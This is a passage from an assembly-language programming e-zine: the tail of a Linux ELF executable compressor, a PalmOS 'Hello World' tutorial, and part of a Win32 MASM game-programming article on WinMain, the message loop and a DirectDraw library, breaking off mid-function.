U13:    add     dl,dl           ; get highest bit from control_byte
        jnz     U14    ; is it last non-zero bit ? = all 8 bits was processed ?
        lodsb                   ; load control_byte
        xchg    edx,eax         ; store control_byte to DL
        adc     dl,dl           ; put last bit from last control_byte to bit 0.
                                ; of new control_byte
U14:    ret

U15:    pop     eax
        popad
        popfd
        db      0E9h            ; jump
        dd      0

uncompress_routine_end:
uncompress_routine_size equ     $ - uncompress_routine

; -------

MEOF            db      'ERROR OPEN file!',0Ah
MEOFS           equ     $ - MEOF
MECF            db      'ERROR CREAT file!',0Ah
MECFS           equ     $ - MECF
MSEEF           db      'ERROR SEEK to END of file!',0Ah
MSEEFS          equ     $ - MSEEF
MSEBF           db      'ERROR SEEK to BEGIN of file!',0Ah
MSEBFS          equ     $ - MSEBF
MERF            db      'ERROR READ file!',0Ah
MERFS           equ     $ - MERF
MEWF            db      'ERROR WRITE file!',0Ah
MEWFS           equ     $ - MEWF
usage           db      0Ah,'K0mprezz ELF ASM executab1e fy1e usyng OOO alg0ry'
                db      'thm',0Ah
                db      0Ah,'usage: a00 '
                db      'filename_for_compress compressed_filename',0Ah,0Ah
                db      'ASM coding in LINUX by Feryno',0Ah
                db      'Feryno: ASSEMBLER-only and DISASSEMBLER-only wonderfu'
                db      'l'
                db      0Ah,0Ah
usagesize       equ     $ - usage
progress_text   db      0Dh,'00000000h/00000000h'
progress_text_size      equ     $ - progress_text

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
                                ;;
filesize        equ     $ - $$  ;;
                                ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

SECTION .bss
ALIGNB 4

f0h             resd    1       ; in_file handle
f1h             resd    1       ; out_file handle
f0s_2           resd    1       ; in_file size
f0s             resd    1       ; in_file size
position        resd    1       ; required by putbit procedures
konyc_dat       resd    1
last_delta      resd    1

fy1eObuffer     resb    4Ch             ; header of a file
f0b             resb    100000h         ; kode & data of a fy1e
f0b_size        equ     $ - fy1eObuffer

f1b_size        equ     200000h
f1b             resb    f1b_size


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
                                ;;
bsssize         equ     $ - $$  ;;
                                ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
                                                ;;
memsize         equ     filesize+bsssize        ;;
                                                ;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::........................................PALMOS.ENVIRONMENT
                                                               Hello Tiny World
                                                               by Latigo


Hola! This is a tutorial on assembler for the PalmOS enviroment. I decided to
write them due to the lack of material on the web. To assemble the asm
presented in this paper, you need to get Darrin Massena's ASDK; which can be
downloaded from http://www.massena.com/darrin/pilot/index.html. The ASDK
contains an assembler,disassembler, the palm emulator and many other great
tools. Massena is the low-level-semi-god-techno-guru who created the assembler
(Pila), along with many other tools and documents. He was my starting point
(and for many others too) for asm coding in the Palm enviroment.

The Palm uses a variation of the 68K Motorola CPU called 'DragonBall' which has
8 32-bit Data registers (from D0 to D7), 8 Addres registers (from A0 to A7)
being A7 the stack pointer,one PC register which is the 'Program Counter' which
contains the address of the instruction to be executed next and one 16 bits
register called the Status Register (SR). Another thing to be noted is the way
operands are specified in the DragonBall enviroment. It's not 'DEST,SRC' as in
the Wintel world we all know, but 'SRC,DEST'. Say if you wanted to copy all the
contents of the D7 register to the D0 this should be done: 'MOVE.L D7,D0'.

One last very important thing too is how to specify data types. In the previous
example i used 'MOVE.L' where '.L' is talking about a 'long' data type. I could
have used '.b' or '.w' meaning byte and word respectively. The size is always
appended, when suitable, to the instruction nmemonic. So what im gonna show you
here is something pretty basic, but will be enough as a start. It's the
typicall 'Hello World'.


Theory:
-------
We will create a basic Palm program in assembly which will make use of the
FrmAlert Systrap in order to display an Alert Resource.

Word FrmAlert (
        Word alertId
);

As you can see this Systrap (the word Systrap can be taken as a sinonym of the
word 'API') takes one parameter. An Alert resource. There are many resource
types (String,Form,version,etc) but we only care for the 'Alert' type. All this
means that we must create a resource file (.rcp) which includes our Alert and
the Asm file (.asm) which contains the code to display the Alert resource.

All this said, lets do some 'Hello tiny world' :)


The resource file (Hello.rcp):
------------------------------

; Here we are going to declare our resources. In this case only an Alert
; resource is going to be create since that's all we need

        ALERT ID 1000
; This is the ID of our Alert.

        INFORMATION
; This is the TYPE of the Alert. It could be [INFORMATION]
; or [CONFIRMATION] or [WARNING] or [ERROR]

        BEGIN
; Beginning of the Alert resource. Let's define all it's properties.

        TITLE "Hello tiny World!"
; This would be the title of the Alert

        MESSAGE "This is just the beginning!"
; Yes, you guessed. Its the Message

        BUTTONS "Ciao :)"
; In this case we have only one button

        END
; END of the Alert resource


The asm file (Hello.asm):
-------------------------

Appl    "MBox", 'Lat1'

; This sets the program's name and Id. The name is the one that will show up in
; the installed program's list. The ID is that,an ID :)

include "Pilot.inc"
; Just like windows.inc, full of constants, structure offsets,API trap codes,
; etc.

include "Startup.inc"
; Startup.inc contains a standard startup function which must be the first
; within an application and is called by the PalmOS after the app is loaded.
; SysAppStartup is first executed, if it doesn't fail, then PilotMain in our
; app is called and after it returns, SysAppExit is called. In short, don't
; remove this :)


MyAlert   equ     1000
; Some Constants

        code

proc PilotMain(cmd.w, cmdPBP.l, launchFlags.w)

; Just like WinMain; PilotMain's prototype is in Pilot.inc.
; It takes three parameters, a WORD (cmd), a LONG (cmdPBP) and another WORD
; (launchFlags)
; Whenever parameters are passed to API calls, their size has to specified too.
; So '.b' for a byte,'.w' for a word and '.l' for a Long.
; Remember that PilotMain is called from StartUp.inc!!

beginproc
; Marks the beginning of a procedure by reserving the needed space in the stack
; for local variables if any. To do this it performs the link a6,#nnnn where
; #nnnn is the number of bytes.

TST.W   cmd(a6)
; PilotMain function is called many times in different circumstances so here we
; check that the cmd parameter is 0 (sysAppLaunchCmdNormalLaunch is 0?) which
; would mean a 'normal' program launching.
; TST.W   cmd(a6) means 'CMP WORD PTR cmd,0' in the Intel enviroment .W implies
; that only 2 bytes out of the cmd variable will be TeSTed cmd(a6) tells pila
; that the cmd variable is a LOCAL variable. Would it have been cmd(a5), then
; the assembler would know that cmd is a GLOBAL variable.

BNE     PmReturn
; BNE = Branch Not Equal. Just like the beloved JNZ

systrap FrmAlert(#MyAlert.w)
; MessageBox! :) systrap is the keyword to invoke APIs, it PUSHes the specified
; parameters and cleans the stack after the API execution.
; # means that MyAlert is specifying a CONSTANT NUMBER and .w means that
; MyAlert is making reference to a WORD
;
; systrap FrmAlert(#MyAlert.w) would be the same as:
; move.w  #MyAlert,-(a7)         = push alert id on stack and decrement it
; trap    #15                    = PalmOS API call
; dc.w    sysTrapFrmAlert        = invoke the alert dialog! by declaring the
;                                  word that is equivalent to 'sysTrapFrmAlert'
; addq.l  #2,a7                  = correct stack


PmReturn
; Just a Label

endproc
; Sefin�, endproc executes the unlk and rts instructions

;-----------------------Resources------------------------------
; Here we must 'tell' pila all those resources that we created so it will
; include them to our assembled code.
; We now declare ALL the resources being used by Hello.asm, the keyword 'res'
; is first placed; followed by the TYPE of the resource.


        ;-=Alert   Resources=-
res 'Talt', MyAlert, "Talt03e8.bin"


        ; This resource defines launch flags, stack and heap size :)
res     'pref', 1
        dc.w    sysAppLaunchFlagNewStack|sysAppLaunchFlagNewGlobals|sysAppLaunc
hFlagUIApp|sysAppLaunchFlagSubCall
        dc.l    $1000                   ; stack size
        dc.l    $1000                   ; heap size


;------------------------------ end --------------------------------------------

That's all my friends! to assemble and link this program execute the following:

        pilrc Hello.rcp
        pila Hello.asm

Pilrc being the resource compiler and pila the assembler of course.
Well, that's it! easy huh? Next time i'll complicate things a little bit
including a Form :)
Should your Palm Asm hunger be unstoppable, you could check my site
for more coding and reversing stuff: www.latigo.cjb.net.

Take Care! Bye!

Latigo


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.............................................GAMING.CORNER
                                            Win32 ASM Game Programming - Part 2
                                            by Chris Hobbs


[This series  of articles was  first  posted at  GameDev.net and  is now  being
 published here with the author's permission. Here is Chris Hobbs' introduction
 on this particular article:

 "A continuation of the  development of SPACE-TRIS.  This one covers the coding
  of WinMain, a Direct Draw library, and a Bitmap library."

 Visit his website at http://www.fastsoftware.com.
 Preface, Html-to-Txt conversion and formating by Chili]


Where Did We Leave Off?
-----------------------
The last article discussed many basics of Win32 ASM programming, introduced you
to the game we will be creating, and guided you through the design process. Now
it is time to take it a few steps further. First, I will cover, in depth, the
High Level constructs of MASM that make it extremely readable ( at generally no
performance cost ), and make it as easy to write as C expressions. Then, once
we have a solid foundation in our assembler we will take a look at the Game
Loop and the main Windows procedures in the code. With that out of the way we
will take a peek at Direct Draw and the calls associated with it. Once, we
understand how DirectX works we can build our Direct Draw library. After that
we will build our bitmap file library. Finally, we will put it all together in
a program that displays our Loading Game screen and exits when you hit the
escape key.

It is a pretty tall order but I am pretty sure we can cover all of the topics
in this article. Remember: If you want to compile the code you need the MASM32
[http://www.pbq.com.au/home/hutch/] package, or at the very least a copy of
MASM 6.11+.

If you are already familiar with MASM's HL syntax then I would suggest skipping
the next section. However, those of you who are rusty, or have never even heard
of it, head on to the next section. There you will learn more than you will
probably ever need to know about this totally cool addition to our assembler.


MASM's HL Syntax
----------------
I am sure many of you have seen an old DOS assembly language listing. Take a
moment to recall that listing, and picture the code. Scary? Well, 9 times out
of 10 it was scary. Most ASM programmers wrote very unreadable code, simply
because that was the nature of their assembler. It was littered with labels and
jmp's, and all sorts of other mysterious things. Try stepping through it with
your mental computer. Did you crash? Yeah, don't feel bad. It is just how it
is. Now, that was the 9 out of 10 ... what about that 1 out of 10? What is the
deal with them? Well, those are the programmers who coded MACRO's to facilitate
High Level constructs in their programs. For once, Microsoft did something
incredibly useful with MASM 6.0 ... they built those HL MACRO's, that smart
programmers had devised, into MASM as pseudo-ops.

If you aren't aware of what this means I will let you in on it. MASM's assembly
code is now just as readable and easy to write as C. This, of course, is just
my opinion. But, it is an opinion shared by thousands and thousands of ASM
coders. So, now that I have touted its usefulness let's take a look at some C
constructs and their MASM counterparts.


                              IF - ELSE IF - ELSE

        The C version:                          The MASM version:

        if ( var1 == var2 )                     .if ( var1 == var2 )
        {                                           ; Code goes here
            // Code goes here                   .elseif ( var1 == var3 )
        }                                           ; Code goes here
        else                                    .else
        if ( var1 == var3 )                         ; Code goes here
        {                                       .endif
            // Code goes here
        }
        else
        {
            // Code goes here
        }


                                  DO - WHILE

        The C version:                          The MASM version:

        do                                      .repeat
        {                                           ; Code goes here
            // Code goes here                   .until ( var1 != var2 )
        }
        while ( var1 == var2 );


                                     WHILE

        The C version:                          The MASM version:

        while ( var1 == var2 )                  .while ( var1 == var2 )
        {                                           ; Code goes here
            // Code goes here                   .endw
        }


Those are the constructs that we can use in our code. As you can see they are
extremely simple and allow for nice readable code. Something assembly language
has long been without. There is no performance loss for using these constructs,
at least I haven't found any. They typically generate the same jmp and cmp code
that a programmer would if he were writing it with labels and such. So, feel
free to use them in your code as you see fit ... they are a great asset.

There is one other thing we should discuss and that is the psuedo-ops that
allow us to define procedures/functions easily. PROTO and PROC. Using them is
really simple. To begin with, just as in C you need to have a prototype. In
MASM this is done with the PROTO keyword. Here are some examples of declaring
protoypes for your procedures:


        ;==================================
        ; Main Program Procedures
        ;==================================
        WinMain PROTO           :DWORD,:DWORD,:DWORD,:DWORD
        WndProc PROTO           :DWORD,:DWORD,:DWORD,:DWORD


The above code tells the assembler it should expect a procedure by the name of
WinMain and one by the name of WndProc. Each of these has a parameter list
associated with them. They both happen to expect 4 DWORD values to be passed to
them. For those of you using the MASM32 package, you already have all of the
Windows API functions prototyped, you just need to include the appropriate
include file. But, you need to make sure that any user defined procedure is
prototyped in the above fashion.

Once we have the function prototyped we can create it. We do this with the PROC
keyword. Here is an example:


;########################################################################
; WinMain Function
;########################################################################
WinMain PROC    hInstance       :DWORD,
                hPrevInst       :DWORD,
                CmdLine         :DWORD,
                CmdShow         :DWORD


        ;===========================
        ; We are through
        ;===========================
        return msg.wParam

WinMain endp
;########################################################################
; End of WinMain Procedure
;########################################################################


By writing our functions in this manner we can access all passed parameters by
the name we give to them. The above function is WinMain w/o any code in it. You
will see the code in a minute. For now though, pay attention to how we setup
the procedure. Also notice how it allows us to create much cleaner looking
code, just like the rest of the high level constructs in MASM do also.


Getting A Game Loop Running
---------------------------
Now that we all know how to use our assembler, and the features contained in
it, lets get a basic game shell up and running.

The first thing we need to do is get setup to enter into WinMain(). You may be
wondering why the code doesn't start at WinMain() like in C/C++. The answer is:
in C/C++ it doesn't start there either. The code that we will write is
generated for you by the compiler, therefore it is completely transparent to
you. We will most likely do it differently than the compiler, but the premise
will be the same. So here is what we will code to get into the WinMain()
function...


  .CODE

start:
        ;==================================
        ; Obtain the instance for the
        ; application
        ;==================================
        INVOKE GetModuleHandle, NULL
        MOV     hInst, EAX

        ;==================================
        ; Is there a commandline to parse?
        ;==================================
        INVOKE GetCommandLine
        MOV     CommandLine, EAX

        ;==================================
        ; Call the WinMain procedure
        ;==================================
        INVOKE WinMain,hInst,NULL,CommandLine,SW_SHOWDEFAULT

        ;==================================
        ; Leave the program
        ;==================================
        INVOKE ExitProcess,EAX


The only thing that may seem a little confusing is why we MOV EAX into a
variable at the end of a INVOKE. The reason is all Windows functions, and C
functions for that matter, place the return value of a function/procedure in
EAX. So we are effectively doing an assignment statement with a function when
we move a value from EAX into something. This code above is going to be the
same for every Windows application that you write. At least, I have never had
need to change it. The code simply sets everything up and ends it when we are
finished.

If you follow the code you will see that it calls WinMain() for us. This is
where things can get a bit confusing ... so let's have a look at the code
first.


;########################################################################
; WinMain Function
;########################################################################
WinMain PROC    hInstance       :DWORD,
                hPrevInst       :DWORD,
                CmdLine         :DWORD,
                CmdShow         :DWORD

        ;====================
        ; Put LOCALs on stack
        ;====================
        LOCAL wc        :WNDCLASS

        ;==================================================
        ; Fill WNDCLASS structure with required variables
        ;==================================================
        MOV     wc.style, CS_OWNDC
        MOV     wc.lpfnWndProc,OFFSET WndProc
        MOV     wc.cbClsExtra,NULL
        MOV     wc.cbWndExtra,NULL
        m2m     wc.hInstance,hInst      ;<< NOTE: macro not mnemonic
        INVOKE GetStockObject, BLACK_BRUSH
        MOV     wc.hbrBackground, EAX
        MOV     wc.lpszMenuName,NULL
        MOV     wc.lpszClassName,OFFSET szClassName
        INVOKE LoadIcon, hInst, IDI_ICON        ; icon ID
        MOV     wc.hIcon,EAX
        INVOKE LoadCursor,NULL,IDC_ARROW
        MOV     wc.hCursor,EAX

        ;================================
        ; Register our class we created
        ;================================
        INVOKE RegisterClass, ADDR wc

        ;===========================================
        ; Create the main screen
        ;===========================================
        INVOKE CreateWindowEx,NULL,
                ADDR szClassName,
                ADDR szDisplayName,
                WS_POPUP OR WS_CLIPSIBLINGS OR \
                WS_MAXIMIZE OR WS_CLIPCHILDREN,
                0,0,640,480,
                NULL,NULL,
                hInst,NULL
  
        ;===========================================
        ; Put the window handle in for future uses
        ;===========================================
        MOV     hMainWnd, EAX

        ;====================================
        ; Hide the cursor
        ;====================================
        INVOKE ShowCursor, FALSE

        ;===========================================
        ; Display our Window we created for now
        ;===========================================
        INVOKE ShowWindow, hMainWnd, SW_SHOWDEFAULT

        ;=================================
        ; Intialize the Game
        ;=================================
        INVOKE Game_Init

        ;========================================
        ; Check for an error if so leave
        ;========================================
        .IF EAX != TRUE
                JMP shutdown
        .ENDIF

        ;===================================
        ; Loop until PostQuitMessage is sent
        ;===================================
        .WHILE TRUE
                INVOKE PeekMessage, ADDR msg, NULL, 0, 0, PM_REMOVE
                .IF (EAX != 0)
                        ;===================================
                        ; Break if it was the quit message
                        ;===================================
                        MOV EAX, msg.message
                        .IF EAX == WM_QUIT
                                ;======================
                                ; Break out
                                ;======================
                                JMP shutdown
                        .ENDIF

                        ;===================================
                        ; Translate and Dispatch the message
                        ;===================================
                        INVOKE TranslateMessage, ADDR msg
                        INVOKE DispatchMessage, ADDR msg

                .ENDIF

                ;================================
                ; Call our Main Game Loop
                ;
                ; NOTE: This is done every loop
                ; iteration no matter what
                ;================================
                INVOKE Game_Main

        .ENDW

shutdown:
        ;=================================
        ; Shutdown the Game
        ;=================================
        INVOKE Game_Shutdown

        ;=================================
        ; Show the Cursor
        ;=================================
        INVOKE ShowCursor, TRUE

getout:
        ;===========================
        ; We are through
        ;===========================
        return msg.wParam

WinMain endp
;########################################################################
; End of WinMain Procedure
;########################################################################


This is quite a bit of code and is rather daunting at first glance. But, let's
examine it a piece at a time. First we enter the function, notice that the
local variables ( in this case a WNDCLASS variable ) get placed on the stack
without your having to code anything. The code is generated for you ... you can
declare local variables like in C. Thus, at the end of the procedure we don't
need to tell the assembler how much to pop off of the stack ... it is done for
us also. Then, we fill in this structure with various values and variables.
Note the use of m2m. This is because in ASM you are not allowed to move a
memory value to another memory location w/o placing it in a register, or on the
stack first.

Next, we make some calls to register our window class and create a new window.
Then, we hide the cursor. You may want the cursor ... but for our game we do
not. Now we can show our window and try to initialize our game. We check for an
error after calling the Game_Init() procedure. If there was an error the
function would not return true and this would cause our program to jump to the
shutdown label. It is important that we jump over the main message loop. If we
do not, the program will continue executing. Also, make sure that you do not
just return out of the code ... there still may be some things that need to be
shutdown. It is good practice in ASM, just as in all other languages, to have
one entry point and one exit point in each of your procedures -- this makes
debugging easier.

Now for the meat of WinMain(): the message loop. For those of you that have
never seen a Windows message loop before here is a quick explanation. Windows
maintains a queue of messages that the application receives -- whether from
other applications, user generated, or internal. In order to do ANYTHING an
application must process messages. These tell you that a key has been pressed,
the mouse button clicked, or the user wants to exit your program. If this were
a normal program, and not a high performance game, we would use GetMessage() to
retrieve a message from the queue and act upon it.

The problem however is, if there are no messages, the function WAITS until it
receives one. This is totally unacceptable for a game. We need to be constantly
performing our loop, no matter what messages we receive. So, one way around
this, is to use PeekMessage() instead. PeekMessage() will return zero if it has
no messages, otherwise it will grab it off of the queue.

What this means is, if we have a message, it will get translated and dispatched
to our callback function. Furthermore, if we do not, then the main game loop
will be called instead. Now here is the trick, by arranging the code just
right, the main game loop will be called -- even if we process a message. If we
did not do this, then Windows could process 1,000's of messages while our game
loop wouldn't execute once!

Finally, when a quit message is passed to the queue we will jump out of our
loop and execute the shutdown code. And that ... is the basic game loop.


Connecting to Direct Draw
-------------------------
Now we are going to get a little bit advanced. But, only for this section.
Unfortunately there is no cut and dry way to view DirectX in assembly. So, I am
going to explain it briefly, show you how to use it, and then forget about it.
This is not that imperative to know about, but it helps if you at least
understand the concepts.

The very first thing you need to understand is the concept of a Virtual
Function Table. This is where your call really goes to be blunt about it. The
call offsets into this table, and from it selects the proper function address
to jump to. What this means to you is your call to a function is actually a
call to a simple look-up table that is already generated. in this way, DirectX
or any other type library such as DirectX can change functions in a library w/o
you ever having to know about it.

Once we have gotten that straight we can figure out how to make calls in
DirectX. Have you guessed how yet? The answer is we need to mimic the table in
some way so that our call is offset into the virtual table at the proper
address. We start by simply having a base address that gets called, which is a
given in DirectX libraries. Then we make a list of all functions for that
object appending the size of their parameters. This is our offset into the
table. Now, we are all set to call the functions.

Calling these functions can be a bit of work. First you have to specify the
address of the object that you want to make the call on. Then, you have to
resolve the virtual address, and then, finally, push all of the parameters onto
the stack, including the object, for the call. Ugly isn't it? For that reason
there is a set of macros provided that will allow you to make calls for these
objects fairly easily. I will only cover one since the rest are based on the
same premise. The most basic one is DD4INVOKE. This macro is for a Direct Draw
4 object. It is important that we have different invokes for different versions
of the same object. If we did not, then wrong routines would be called since
the Virtual Table changes as they add/remove functions from the lib's.

The idea behind the macro is fairly simple. First, you specify the function
name, then the object name, and then the parameters. Here is an example:


        ;========================================
        ; Now create the primary surface
        ;========================================
        DD4INVOKE CreateSurface, lpdd, ADDR ddsd, ADDR lpddsprimary, NULL


The above line of code calls the CreateSurface() function on a Direct Draw 4
object. It passes the pointer to the object, the address of a Direct Draw
Surface Describe structure, the address of the variable to hold the pointer to
the surface, and finally NULL. This call is an example of how we will interface
to DirectX in this article series. Now that we have seen how to make calls to
DirectX, we need to build a small library for us to use which we cover in the
next section.


Our Direct Draw Library
-----------------------
Alright, we are now ready to start coding our Direct Draw library routines. So,
the logical starting place would be figuring out what kinds of routines we will
need for the game. Obviously we want an initialization and shutdown routine,
and we are going to need a function to lock and unlock surfaces. Also, it would
be nice to have a function to draw text, and, since the game is going to run in
16 bpp mode, we will want a function that can figure out the pixel format for
us. It would also be a good idea to have a function that creates surfaces,
loads a bitmap into a surface, and a function to flip our buffers for us. That
should cover it ... so lets get started.

The first routine that we will look at is the initialization routine. This is
the most logical place to start, especially since the routine has just about
every type of call we will be using in Direct Draw. Here is the code:

 
;########################################################################
; DD_Init Procedure
;########################################################################
DD_Init PROC    screen_width:DWORD, screen_height:DWORD, screen_bpp:DWORD

        ;=======================================================
        ; This function will setup DD to full screen exclusive
        ; mode at the passed in width, height, and bpp
        ;=======================================================

        ;=================================
        ; Local Variables
        ;=================================
        LOCAL lpdd_1    :LPDIRECTDRAW

        ;=============================
        ; Create a default object
        ;=============================
        INVOKE DirectDrawCreate, 0, ADDR lpdd_1, 0

        ;=============================
        ; Test for an error
        ;=============================
        .IF EAX != DD_OK
                ;======================
                ; Give err msg
                ;======================
                INVOKE MessageBox, hMainWnd, ADDR szNoDD, NULL, MB_OK

                ;======================
                ; Jump and return out
                ;======================
                JMP err

        .ENDIF

        ;=========================================
        ; Lets try and get a DirectDraw 4 object
        ;=========================================
        DDINVOKE QueryInterface, lpdd_1, ADDR IID_IDirectDraw4, ADDR lpdd

        ;=========================================
        ; Did we get it??
        ;=========================================
        .IF EAX != DD_OK
                ;==============================
                ; No so give err message
                ;==============================
                INVOKE MessageBox, hMainWnd, ADDR szNoDD4, NULL, MB_OK

                ;======================
                ; Jump and return out
                ;======================
                JMP err

        .ENDIF

        ;===================================================
        ; Set the cooperative level
        ;===================================================
        DD4INVOKE SetCooperativeLevel, lpdd, hMainWnd, \
                DDSCL_ALLOWMODEX OR DDSCL_FULLSCREEN OR \
                DDSCL_EXCLUSIVE OR DDSCL_ALLOWREBOOT

        ;=========================================
        ; Did we get it??
        ;=========================================
        .IF EAX != DD_OK
                ;==============================
                ; No so give err message
                ;==============================
                INVOKE MessageBox, hMainWnd, ADDR szNoCoop, NULL, MB_OK

                ;======================
                ; Jump and return out
                ;======================
                JMP err

        .ENDIF

        ;===================================================
        ; Set the Display Mode
        ;===================================================
        DD4INVOKE SetDisplayMode, lpdd, screen_width, \
                screen_height, screen_bpp, 0, 0

        ;=========================================
        ; Did we get it??
        ;=========================================
        .IF EAX != DD_OK
                ;==============================
                ; No so give err message
                ;==============================
                INVOKE MessageBox, hMainWnd, ADDR szNoDisplay, NULL, MB_OK

                ;======================
                ; Jump and return out
                ;======================
                JMP err

        .ENDIF

        ;================================
        ; Save the screen info
        ;================================
        m2m     app_width, screen_width
        m2m     app_height, screen_height
        m2m     app_bpp, screen_bpp

        ;========================================
        ; Setup to create the primary surface
        ;========================================
        DDINITSTRUCT OFFSET ddsd, SIZEOF(DDSURFACEDESC2)
        MOV     ddsd.dwSize, SIZEOF(DDSURFACEDESC2)
        MOV     ddsd.dwFlags, DDSD_CAPS OR DDSD_BACKBUFFERCOUNT;
        MOV     ddsd.ddsCaps.dwCaps, DDSCAPS_PRIMARYSURFACE OR \
                        DDSCAPS_FLIP OR DDSCAPS_COMPLEX
        MOV     ddsd.dwBackBufferCount, 1

        ;========================================
        ; Now create the primary surface
        ;========================================
        DD4INVOKE CreateSurface, lpdd, ADDR ddsd, ADDR lpddsprimary, NULL

        ;=========================================
        ; Did we get it??
        ;=========================================
        .IF EAX != DD_OK
                ;==============================
                ; No so give err message
                ;==============================
                INVOKE MessageBox, hMainWnd, ADDR szNoPrimary, NULL, MB_OK

                ;======================
                ; Jump and return out
                ;======================
                JMP err

        .ENDIF

        ;==========================================
        ; Try to get a backbuffer
        ;==========================================
        MOV     ddscaps.dwCaps, DDSCAPS_BACKBUFFER
      DDS4INVOKE GetAttachedSurface, lpddsprimary, ADDR ddscaps, ADDR lpddsback

        ;=========================================
        ; Did we get it??
        ;=========================================
        .IF EAX != DD_OK
                ;==============================
                ; No so give err message
                ;==============================
                INVOKE MessageBox, hMainWnd, ADDR szNoBackBuffer, NULL, MB_OK

                ;======================
                ; Jump and return out
                ;======================
                JMP err

        .ENDIF

        ;==========================================
        ; Get the RGB format of the surface
        ;==========================================
        INVOKE DD_Get_RGB_Format, lpddsprimary

done:
        ;===================
        ; We completed
        ;===================
        return TRUE

err:
        ;===================
        ; We didn't make it
        ;===================
        return FALSE

DD_Init      ENDP
;########################################################################
; END DD_Init
;########################################################################


The above code is fairly complex so let's see what each individual section
does.

The first step is we create a default Direct Draw object. This is nothing more
than a simple call with a couple of parameters. NOTE: since it is NOT based on
an already created object, the function is not virtual. Therefore, we can call
it like a normal function using invoke. Also, notice how we check for an error
right afterwards. This is very important in DirectX. In the case of an error,
we merely give a message, and then jump to the error return at the bottom of
the procedure.

The second step is we query for a DirectDraw4 object. We will almost always
want the newest version of the objects, and querying after you have the base
object is the way to get them. If this succeeds we then set the cooperative
level and the display mode for our game. Nothing major ... but don't forget to
check for errors.

Our next step is to create a primary surface for the object that we have. If
that succeeds we create the back buffer. The structure that we use in this
call, and other DirectX calls, needs to be cleared before using it. This is
done in a macro, DDINITSTRUCT, that I have included in the DDraw.inc file.

The final thing we do is make a call to our routine that determines the pixel
format for our surfaces. All of these pieces fit together into initializing our
system for use.

The next routine we will look at is the pixel format obtainer. This is a fairly
advanced routine so I wanted to make sure that we cover it. Here is the code:


;########################################################################
; DD_Get_RGB_Format Procedure
;########################################################################
DD_Get_RGB_Format       PROC    surface:DWORD

        ;=========================================================
        ; This function will setup some globals to give us info
        ; on whether the pixel format of the current diaplay mode
        ;=========================================================

        ;====================================
        ; Local variables
        ;====================================
        LOCAL shiftcount :BYTE

        ;================================
        ; get a surface despriction
        ;================================
        DDINITSTRUCT ADDR ddsd, sizeof(DDSURFACEDESC2)
        MOV     ddsd.dwSize, sizeof(DDSURFACEDESC2)
        MOV     ddsd.dwFlags, DDSD_PIXELFORMAT
        DDS4INVOKE GetSurfaceDesc, surface, ADDR ddsd

        ;==============================
        ; fill in masking values
        ;==============================
        m2m     mRed, ddsd.ddpfPixelFormat.dwRBitMask   ; Red Mask
        m2m     mGreen, ddsd.ddpfPixelFormat.dwGBitMask ; Green Mask
        m2m     mBlue, ddsd.ddpfPixelFormat.dwBBitMask  ; Blue Mask

        ;====================================
        ; Determine the pos for the red mask
        ;====================================
        MOV     shiftcount, 0
        .WHILE (!(ddsd.ddpfPixelFormat.dwRBitMask & 1))
                SHR     ddsd.ddpfPixelFormat.dwRBitMask, 1
                INC     shiftcount
        .ENDW
        MOV     AL, shiftcount
        MOV     pRed, AL

        ;=======================================
        ; Determine the pos for the green mask
        ;=======================================
        MOV     shiftcount, 0
        .WHILE (!(ddsd.ddpfPixelFormat.dwGBitMask & 1))
                SHR     ddsd.ddpfPixelFormat.dwGBitMask, 1
                INC     shiftcount
        .ENDW
        MOV     AL, shiftcount
        MOV     pGreen, AL

        ;=======================================
        ; Determine the pos for the blue mask
        ;=======================================
        MOV     shiftcount, 0
        .WHILE (!(ddsd.ddpfPixelFormat.dwBBitMask & 1))
                SHR     ddsd.ddpfPixelFormat.dwBBitMask, 1
                INC     shiftcount
        .ENDW
        MOV     AL, shiftcount
        MOV     pBlue, AL

        ;===========================================
        ; Set a special var if we are in 16 bit mode
        ;===========================================
        .IF app_bpp == 16
                .IF pRed == 10
                        MOV     Is_555, TRUE
                .ELSE
                        MOV     Is_555, FALSE
                .ENDIF
        .ENDIF

done:
        ;===================
        ; We completed
        ;===================
        return TRUE

DD_Get_RGB_Format ENDP
;########################################################################
; END DD_Get_RGB_Format
;########################################################################


First, we initialize our description structure and make a call to get the
surface description from Direct Draw. We place the masks that are returned in
global variables, since we will want to use them in all kinds of places. A mask
is a value that you can use to set or clear certain bits in a
variable/register. In our case, we use them to mask off the unnecessary bits so
that we can access the red, green, or blue bits of our pixel individually.

The next three sections of code are used to determine the number of bits in
each color component. For example, if we had set the mode to 24 bpp, then there
would be 8-bits in every component. The way we determine the number of bits it
needs to be moved is by shifting each mask to the right by 1 and AND'ing it
with the number one. This allows us to effectively count all the bits we need
to shift by in order to move our component into its proper position. This works
because the mask is going to contain a 1 where the bits are valid. So, by
AND'ing it with the 1 we are able to see if the bit was turned on or not, since
the number one will leave only the first bit set and turn all others off.

Finally, we set a variable that tells us whether or not the video mode is 5-5-5
or 5-6-5. This is extremely important since 16 bpp mode can be either, and we
do not want our pictures to have a green or purple tint on one machine, and
look fine on another one!

The last function that I want to cover in our Direct Draw library is the text
drawing function. This uses GDI and so I figured I should at least give it a
small explanation. The code ...


;########################################################################
; DD_Draw_Text Procedure
;########################################################################
DD_Draw_Text    PROC    surface:DWORD, text:DWORD, num_chars:DWORD, 
                                x:DWORD, y:DWORD, color:DWORD

        ;=======================================================
        ; This function will draw the passed text on the passed
        ; surface using the passed color at the passed coords
        ; with GDI
        ;=======================================================

        ;===========================================
        ; First we need to get a DC for the surface
        ;===========================================
        DDS4INVOKE GetDC, surface, ADDR hDC

        ;===========================================
        ; Set the text color and BK mode
        ;===========================================
        INVOKE SetTextColor, hDC, color
        INVOKE SetBkMode, hDC, TRANSPARENT

        ;===========================================
